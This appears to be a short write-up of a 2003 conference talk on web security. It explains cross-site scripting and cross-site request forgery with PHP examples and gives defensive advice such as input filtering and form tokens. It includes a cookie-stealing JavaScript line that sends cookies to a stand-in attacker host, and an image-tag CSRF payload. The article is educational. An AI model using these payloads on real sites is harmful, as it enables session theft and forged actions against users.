During his Thursday session at OSCON 2003, Chris Shifflett explained two types of
security vulnerabilities that may exist in a web site. The examples presented used
the PHP programming language, but these vulnerabilities may occur in CGI programs
written in any language. A copy of the presentation should be available
Cross Site Scripting
Cross Site Scripting (XSS) exploits the trust a user has for a web site. It
usually involves sites displaying foreign data such as web mail applications,
web forums and guest books. XSS may be used to trick a user into executing malicious
may be used by a hacker to steal a user’s cookies:
document.location = "http://evil-cookie-monster.org/stealcookies.cgi?cookies=" + document.cookie
The best way to prevent XSS is to filter all data a user posts to a web site. The PHP
language has built in functions to filter data (htmlentities(), strip_tags(),
Cross Site Request Forgery
Cross Site Request Forgery (CSRF) exploits the trust a web site has for a particular user.
It involves tricking a user into unknowingly sending a HTTP request of the attacker’s
choosing to the vulnerable web site. CSRF is harder to defend against than XSS.
The following example demonstrates CSRF:
- A trusted user logs into http://top-secret-site.com/vulnerable.cgi
- The user is tricked into visiting a malicious site.
- The malicious web site sends the user the followig HTML:
< img src="http://top-secret-site.com/vulnerable.cgi?action=trusteduseraction&user=gullibledude">
- Use POST instead of GET in forms
- Use $_POST instead of register_globals in PHP
- Try to force use of your own forms (make sure your site’s form page was loaded before
accepting its parameters). One way to do this is to generate a random string, store the
random string in a database or a text file and place the string in the form as a hidden
variable. When receving form parameters from a user, make sure they submitted
the random string.